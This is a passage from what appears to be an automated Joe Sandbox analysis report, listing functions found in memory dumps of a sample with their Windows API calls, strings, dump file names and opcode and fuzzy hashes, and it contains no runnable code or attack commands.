Opcode Fuzzy Hash: 268b0fa3b51c439e333988baa946e559f90cd8b729e516d329af8112e83cd52b
Instruction Fuzzy Hash: BE5164B09007098FDB14CFAAC558BEEBBF1AF88300F208559E459B73A1DB75A941CF65

Function 371FD510 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371FD682

Strings

Z/Kq, xrefs: 371FD59E
Z/Kq, xrefs: 371FD5BE

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: CreateWindow
String ID: Z/Kq$Z/Kq
API String ID: 716092398-809427168
Opcode ID: fdc1dbb322a9df52ce781b79da9e30b0837ddd82da3265cb4780fccda7065555
Instruction ID: 8e994e3110be2c503287382cdfa693ba9be35b6c67adb82c88b0be24133e48e0
Opcode Fuzzy Hash: fdc1dbb322a9df52ce781b79da9e30b0837ddd82da3265cb4780fccda7065555
Instruction Fuzzy Hash: 825103B6C00249EFDF02CF95C990ADEBFB1BF49310F24826AE818AB221D7319851CF51

Function 371FD564 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371FD682

Strings

Z/Kq, xrefs: 371FD59E
Z/Kq, xrefs: 371FD5BE

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: CreateWindow
String ID: Z/Kq$Z/Kq
API String ID: 716092398-809427168
Opcode ID: 0845f49cc1ef32f372acd84cc1ec71baf2bbb652dd340f9b683529d499c2b828
Instruction ID: f03963c7b94c09e7df40c5c16ab1c1d9d579fc11336b589bf38447a2dfdde17c
Opcode Fuzzy Hash: 0845f49cc1ef32f372acd84cc1ec71baf2bbb652dd340f9b683529d499c2b828
Instruction Fuzzy Hash: 8751DFB5D00709DFDF15CF9AC990ADEBBB1BF48310F20822AE819AB250D775A841CF90

Function 371FD570 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371FD682

Strings

Z/Kq, xrefs: 371FD59E
Z/Kq, xrefs: 371FD5BE

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: CreateWindow
String ID: Z/Kq$Z/Kq
API String ID: 716092398-809427168
Opcode ID: 3413fe948e8a9a8beed07fef2f6a8323e567c66d1dc3bc81dca04683e25f70c3
Instruction ID: 43521ec2916d8011ede1117a66464a1336a1e519c2240ec8d87609fbbc7902b4
Opcode Fuzzy Hash: 3413fe948e8a9a8beed07fef2f6a8323e567c66d1dc3bc81dca04683e25f70c3
Instruction Fuzzy Hash: F241CEB5D00749DFDF14CF9AC990ADEBBB5BF48310F20822AE819AB250D775A841CF90

Function 00160EC8 Relevance: 3.8, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@G, xrefs: 00160F77
@G, xrefs: 00160F5A
@G, xrefs: 00160F30

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID: @G$@G$@G
API String ID: 0-897220753
Opcode ID: 18413db11f76b0c54dc7931cb094c29926fea8f22d8ca1bdcfbde5e9f7d24de8
Instruction ID: 6a27a382dadae29edb97e1eb2bf01811a62c01eaf909b794fdb2a5ac8c4e15a3
Opcode Fuzzy Hash: 18413db11f76b0c54dc7931cb094c29926fea8f22d8ca1bdcfbde5e9f7d24de8
Instruction Fuzzy Hash: 2B217F74E04248AFDB0AEFB9C9516BEB7B2FF8A304F0084A9D4049B395DB745A51CF51

Function 371FE484 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 371FF2F1

Strings

Z/Kq, xrefs: 371FF247

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: CallProcWindow
String ID: Z/Kq
API String ID: 2714655100-2188043875
Opcode ID: a6daf4584ab944a85fa306343d2e993303634f159fb455f8edba34f31814de78
Instruction ID: a49b9b3f21aa1921bec5eb9f68d731f92754a98c017cc1ce836d1a6d23c8c16f
Opcode Fuzzy Hash: a6daf4584ab944a85fa306343d2e993303634f159fb455f8edba34f31814de78
Instruction Fuzzy Hash: 1A4125B9900309DFDB14CF95C884BAABBF9FB89314F248559D518AB321C775A842CBA0

Function 371FE020 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 371FE0AF

Strings

Z/Kq, xrefs: 371FE047

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: DuplicateHandle
String ID: Z/Kq
API String ID: 3793708945-2188043875
Opcode ID: 68848c1e8809de6434a1f10c5a95e89de8c36816be4d828bc167a7e8d815c31a
Instruction ID: e5b8efd26eff798d192f9cab2a81b1bd2ce2189b4e38d6a857455643e2e45620
Opcode Fuzzy Hash: 68848c1e8809de6434a1f10c5a95e89de8c36816be4d828bc167a7e8d815c31a
Instruction Fuzzy Hash: 4F2114B59002099FDB10CFAAD984ADEBBF4EB48310F14851AE918B7350D378A955CF65

Function 371FE028 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 371FE0AF

Strings

Z/Kq, xrefs: 371FE047

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: DuplicateHandle
String ID: Z/Kq
API String ID: 3793708945-2188043875
Opcode ID: d20643cfab0073d6fc1a55945014d882bb92c28213c0632b8ab1b8e65143b666
Instruction ID: 271faa43442d128e7fe54192284bbd47d380e49b3b0dbcb185d7fe04fe4666cc
Opcode Fuzzy Hash: d20643cfab0073d6fc1a55945014d882bb92c28213c0632b8ab1b8e65143b666
Instruction Fuzzy Hash: 4721F5B59002499FDB10CFAAD484ADEFBF4FB48310F14841AE918A3350D379A954CFA5

Function 3775BFA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3775B1CF), ref: 3775C005

Strings

Z/Kq, xrefs: 3775BFC7

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID: DispatchMessage
String ID: Z/Kq
API String ID: 2061451462-2188043875
Opcode ID: 3e19f0bbb3afe7e7445e1f2b0b54313e2600e238f01da1a6b7b296a48ef9d12a
Instruction ID: 9d4a5ed1facd500d407fc0466dbc091217fce0806e30f6cda8936046a3a9ce48
Opcode Fuzzy Hash: 3e19f0bbb3afe7e7445e1f2b0b54313e2600e238f01da1a6b7b296a48ef9d12a
Instruction Fuzzy Hash: 491110B4C002498FDB20CF9AD844BDEFBF4EB48320F10852AE428A7650D378A544CFA5

Function 371FF488 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00186428,?,?), ref: 371FF4ED

Strings

Z/Kq, xrefs: 371FF4AA

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: Timer
String ID: Z/Kq
API String ID: 2870079774-2188043875
Opcode ID: a3b04dfd31e5ce5093d6ac489981e1424acc59bcf72c18e5be8574363176430e
Instruction ID: e7e3a65fac614567d2bd31aca9c63f1c98e070a9e78e1cfe5488d643244cee68
Opcode Fuzzy Hash: a3b04dfd31e5ce5093d6ac489981e1424acc59bcf72c18e5be8574363176430e
Instruction Fuzzy Hash: 6711D3B5800249DFDB20CF9AD444BDEBFF8EB48320F20895AE558A7350D375AA44CFA5

Function 3775AC88 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3775ACE5

Strings

Z/Kq, xrefs: 3775ACAA

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID: Initialize
String ID: Z/Kq
API String ID: 2538663250-2188043875
Opcode ID: e18817c637666c76319a077d51f2a160b1909a7c5699be950728e0280d9f827f
Instruction ID: 24fdac94bf8e878913282afa7e124e7b9a712f5cd06da07ea98b1d3913ce6c0a
Opcode Fuzzy Hash: e18817c637666c76319a077d51f2a160b1909a7c5699be950728e0280d9f827f
Instruction Fuzzy Hash: BE1115B58003498FDB10CF9AD584BDEBFF4EB48320F20886AD558A7710D378A541CFA5

Function 371FB610 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00186428,?,?), ref: 371FF4ED

Strings

Z/Kq, xrefs: 371FF4AA

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: Timer
String ID: Z/Kq
API String ID: 2870079774-2188043875
Opcode ID: c5a6bec2edfe53bb5549f9d80cabe86b9e6d3bacf14d8afee6305de2d72c77a8
Instruction ID: c88659fb3945fc43d1c4dd0af103498150e2c6f3a69b022a431a4fd1d02486fe
Opcode Fuzzy Hash: c5a6bec2edfe53bb5549f9d80cabe86b9e6d3bacf14d8afee6305de2d72c77a8
Instruction Fuzzy Hash: 351103B5800349DFDB20DF9AD444BDEBBF8EB48320F20841AE958A7310D3B5A940CFA5

Function 37759EA4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3775B1CF), ref: 3775C005

Strings

Z/Kq, xrefs: 3775BFC7

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID: DispatchMessage
String ID: Z/Kq
API String ID: 2061451462-2188043875
Opcode ID: 3fa33903a602698fc197ba8a34461a9e258d55bf03fefd7c42f940bb4c71042e
Instruction ID: 36de52a999f898ca60e13d1a03ab7a08193d2a90a0f51673bd48cca23cdbfac8
Opcode Fuzzy Hash: 3fa33903a602698fc197ba8a34461a9e258d55bf03fefd7c42f940bb4c71042e
Instruction Fuzzy Hash: 6811F2B5C046498FDB20CF9AD844BDEFBF4EB48324F10842AD428B7250D378A544CFA5

Function 37759DF8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3775ACE5

Strings

Z/Kq, xrefs: 3775ACAA

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID: Initialize
String ID: Z/Kq
API String ID: 2538663250-2188043875
Opcode ID: 2b216c2f4a35377cda8617971a87acc8e1db987c9a6ef998213ab78581ffce5f
Instruction ID: 4eafb1dfd1437bac78117f2dda3fdf85d844eccbba83105add3444fa1f6810af
Opcode Fuzzy Hash: 2b216c2f4a35377cda8617971a87acc8e1db987c9a6ef998213ab78581ffce5f
Instruction Fuzzy Hash: 271115B59043498FDB20CF9AD584BDEBFF4EB48320F20846AD558A7710D378A941CFA5

Function 00169EB0 Relevance: 1.8, Strings: 1, Instructions: 529COMMON

Download Yara Rule

Strings

, xrefs: 0016A46F

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e61cbccb03bcf93d7ddc897b9e3651762a646e742dc7d73f50ab095f683f42ce
Instruction ID: bc3e8a18ef4bf8e3f952c5d89d9d80be808ea13db4f37828a41de97a6b6d9511
Opcode Fuzzy Hash: e61cbccb03bcf93d7ddc897b9e3651762a646e742dc7d73f50ab095f683f42ce
Instruction Fuzzy Hash: 22227A30600605CFCB25CF68C894AAEB7F5FF89300F54452AE45AE7651DB34E9A2CF92

Function 36AEF128 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

, xrefs: 36AEF225

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f01a69c3ce478bcb97b37de92a7ba4054ab872391a5239000b0382060b28db07
Instruction ID: bda86f600b236748270f2092fb2e40cae231d8edd2fb9977ba7d21c9c5b688e0
Opcode Fuzzy Hash: f01a69c3ce478bcb97b37de92a7ba4054ab872391a5239000b0382060b28db07
Instruction Fuzzy Hash: 45A1F738B043149FEB05AF74C86865D77A2EFC63A0B20426AE925DB3D1DF358D45CB92

Function 0016DEA7 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

3, xrefs: 0016DEB0

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 18f55a735cf9cbbf84b254d578975a25aee940d6e63e3b1f3e2f8f81524aa491
Instruction ID: 8aeb69bb357a2fa1d4cb92a6b8ed71108e8b602ecc5e3a2199aab6e5f458c5a2
Opcode Fuzzy Hash: 18f55a735cf9cbbf84b254d578975a25aee940d6e63e3b1f3e2f8f81524aa491
Instruction Fuzzy Hash: 8B71C274E00218CFDB18DFA9D894A9DFBF2BF49300F148169E819AB361DB709985DF50

Function 36AEFE58 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

@6U, xrefs: 36AEFEA3

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID: @6U
API String ID: 0-3386423480
Opcode ID: 743468afabc81b0b561814c2dc1f15b92fff50ccb97fe83a39c0b925f5c41909
Instruction ID: dff228d3025e6fb9628d1dff5d17511fbb28e77448343ec273ec95a187831a56
Opcode Fuzzy Hash: 743468afabc81b0b561814c2dc1f15b92fff50ccb97fe83a39c0b925f5c41909
Instruction Fuzzy Hash: 2F31B231B002049FDB05EBB99D55A6EBBF6EFC9241B208079E90ADB351DE318E02D791

Function 36AE6D10 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

760T, xrefs: 36AE6D19

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID: 760T
API String ID: 0-3743294776
Opcode ID: 24551afce725187f01024c94a8952acd689f79d607387a41464e1be726b8dc86
Instruction ID: 8c16d898ef58b3d6b116b81538275b7a130d37390277f3a150503afe025baf79
Opcode Fuzzy Hash: 24551afce725187f01024c94a8952acd689f79d607387a41464e1be726b8dc86
Instruction Fuzzy Hash: 72F0F0353041047FDB11566A9C58AAABBAAAFC5721F60802AF509CB381CAB28D02CB90

Function 001619B8 Relevance: .9, Instructions: 869COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f38151a2682a3ede427eaad2daadd15f2405c411470ab1ede396b66f0d3ac3
Instruction ID: 516b1c6b3fbb74f5949a4021d67e98c9d56f67cc6cd2b1948995e8205b6f40cf
Opcode Fuzzy Hash: a1f38151a2682a3ede427eaad2daadd15f2405c411470ab1ede396b66f0d3ac3
Instruction Fuzzy Hash: 31620C2961D3D29FD7224F305CFB9D5BFA09E0714476D0ACEE0C1664A3DA9A87A9C313

Function 001674E0 Relevance: .7, Instructions: 724COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c46cbcf687b9df811884f0bb7bfb40afde4c11cabc9149d9948d13cad0188db
Instruction ID: 39aea119ed982c935a6db02f2d745e4af4a21c00d5322b44ff8823db2184fdd9
Opcode Fuzzy Hash: 7c46cbcf687b9df811884f0bb7bfb40afde4c11cabc9149d9948d13cad0188db
Instruction Fuzzy Hash: 30626A34604615CFDB25DF64C994BAEBBF2BF48304F208559D4AAD72A1DB30AD62CF90

Function 0016B600 Relevance: .7, Instructions: 681COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf96459ff52482d5e5d7bc749e3d724409290a87d66342c510c7ee5a3984db96
Instruction ID: fd794d81091a0282311fec2c8e0c495a2c13e58e25aac9a289dfb8a308e17152
Opcode Fuzzy Hash: bf96459ff52482d5e5d7bc749e3d724409290a87d66342c510c7ee5a3984db96
Instruction Fuzzy Hash: 54523974A04615CFCB15CF68C9D4AAEB7F1FF88300F15856AE85AEB356D730A891CB90

Function 36AE0C80 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d428949b20b83264c386a3eb7437bdd91ad4004ebb3c8eea308fcacc122b45
Instruction ID: 15385478e72768d6b3f657614616b174e8aaea70ac8fae1241d0871f8a8b3061
Opcode Fuzzy Hash: f1d428949b20b83264c386a3eb7437bdd91ad4004ebb3c8eea308fcacc122b45
Instruction Fuzzy Hash: AF328D34A006588FDB05CFA9C980A9EBBF1FF49314F5185A9E819DB2A1DB30ED51CB90

Function 00168B88 Relevance: .5, Instructions: 498COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e1b2443bf750e3095e7d17adae97497eda672088962eb85be7622aa3de32e1
Instruction ID: cac1c2b1a0cc125fd8a60bcb80e2fd4d237b8a6af131c8aff6add5d2d522332b
Opcode Fuzzy Hash: 93e1b2443bf750e3095e7d17adae97497eda672088962eb85be7622aa3de32e1
Instruction Fuzzy Hash: 9712B0307047018FDB249F34D8547AABBE6FB85300F14496EE45AD72A1DB71EDA2CB91

Function 00169820 Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca44f9579eabd925a10e223923f3966f42edc758cf7b5787403ae65c6709b8bd
Instruction ID: c4ba27ee15380364c4d86ee181931470dbcef9837ac5269c9f8900238729780a
Opcode Fuzzy Hash: ca44f9579eabd925a10e223923f3966f42edc758cf7b5787403ae65c6709b8bd
Instruction Fuzzy Hash: 8F12C374A042169FCB05DF68C894AADBBB6FF49310F148259D859DB2A2C730EC66CB91

Function 0016ABB0 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40923b0c58bf72505408b31499bf676b84f52c7e3a75971a1cf27bcb3d5ddf18
Instruction ID: baa4fa58fe643c81a75dddcfe4c654482945d728666897e7accae601c923b8b4
Opcode Fuzzy Hash: 40923b0c58bf72505408b31499bf676b84f52c7e3a75971a1cf27bcb3d5ddf18
Instruction Fuzzy Hash: D0027E30A04615DFCB19CF64C8947E9FBB2FF49310F54825AD86AA7251D730A8A6CF91

Function 36AE68D7 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6742feffcb8453bb4dc76b56f4715f60146dd6a5328476aed00d0b68bcfd3ea
Instruction ID: c04d6161e3f29eb92cb872eaa447b05ab4b59d9f74a24150f64b78cd99d74767
Opcode Fuzzy Hash: e6742feffcb8453bb4dc76b56f4715f60146dd6a5328476aed00d0b68bcfd3ea
Instruction Fuzzy Hash: CAE1BC78B506158FDB44DF68C998959BBF2FF88714B2184A9E90ADB372DB31EC11CB40

Function 0016F128 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7ac7cb2599819252cb850c787ab9b6fc493118a69869662a9d308fca536600f
Instruction ID: 63bf3788b7841ccecaabf600cd5638a5e73a583ed333f26d7c70dbdb25d18ff8
Opcode Fuzzy Hash: c7ac7cb2599819252cb850c787ab9b6fc493118a69869662a9d308fca536600f
Instruction Fuzzy Hash: 90B1BA313042158FDB19AB34EC68B6A7BE2AF89300F15853DE806DB3A5DB74CC52DB91

Function 36AE4C58 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dbf105cc1403b4a2bf7b29489f88a357941141d4590a32708b047b3abd3649f
Instruction ID: 69dd434a6ac909349c507e42986c1897ac467c3a2321b886c9dd80e27194ab1e
Opcode Fuzzy Hash: 5dbf105cc1403b4a2bf7b29489f88a357941141d4590a32708b047b3abd3649f
Instruction Fuzzy Hash: 3DD1E875A00614CFDB04CFA9D984E9DB7FAFF88B11B568469E805AB361CB34EC41CB64

Function 36AE4B38 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f2416e6e8f7edaf62d189fa44c524f588aae2fa2114b972eaaf30edb866fb0
Instruction ID: bc1be521df5eff0b0d52397f6576c37fdc6b9810ec0d25f2dcb76bd7c86cb5fe
Opcode Fuzzy Hash: 70f2416e6e8f7edaf62d189fa44c524f588aae2fa2114b972eaaf30edb866fb0
Instruction Fuzzy Hash: 07C12A75E00614CFDB04CFA9D984A9DBBF6FF88711B568099E805AB3A1CB34EC41CB64

Function 001659C8 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbf4adf6787e32040dbd03e9519ad4d3a52daca1110df93696efd4355a53260
Instruction ID: 2ff39769a19d26cbe2ddc95cca1a79ebf405aa21be384212111dcde3ffa81adf
Opcode Fuzzy Hash: 5bbf4adf6787e32040dbd03e9519ad4d3a52daca1110df93696efd4355a53260
Instruction Fuzzy Hash: C9C1A434601B01CFD725DF28C894A9ABBF2FF89314F158669D45A8B362DB30ED56CB90

Function 36AE2180 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277a022ae30aea4ad54a40c994f716664bc4ecbc28ce15f6798c1dbd16b52ea4
Instruction ID: c4e059ebc2a7e6fde76e0870770cda8cd74411dbcfd79994ccd6cefd9c408f09
Opcode Fuzzy Hash: 277a022ae30aea4ad54a40c994f716664bc4ecbc28ce15f6798c1dbd16b52ea4
Instruction Fuzzy Hash: 5B81C2347142118FEB19AB39C8A472D77E6EF85794F1404A9E902CF3B6DE25CC42CB59

Function 001674D0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb73124cc62471bd70f3505e09a7ae78045de01baaec2e9c6f42ae7cb9b8e535
Instruction ID: ea2a400214436b9499cb721c9e4df5a27ad6b861a91f6a789d60252caed50aed
Opcode Fuzzy Hash: bb73124cc62471bd70f3505e09a7ae78045de01baaec2e9c6f42ae7cb9b8e535
Instruction Fuzzy Hash: 2BB16D34A04655CFDB15CF28C894BAABBF2BF48308F148599D45A9B3A1DB30ED56CF90

Function 0016F688 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

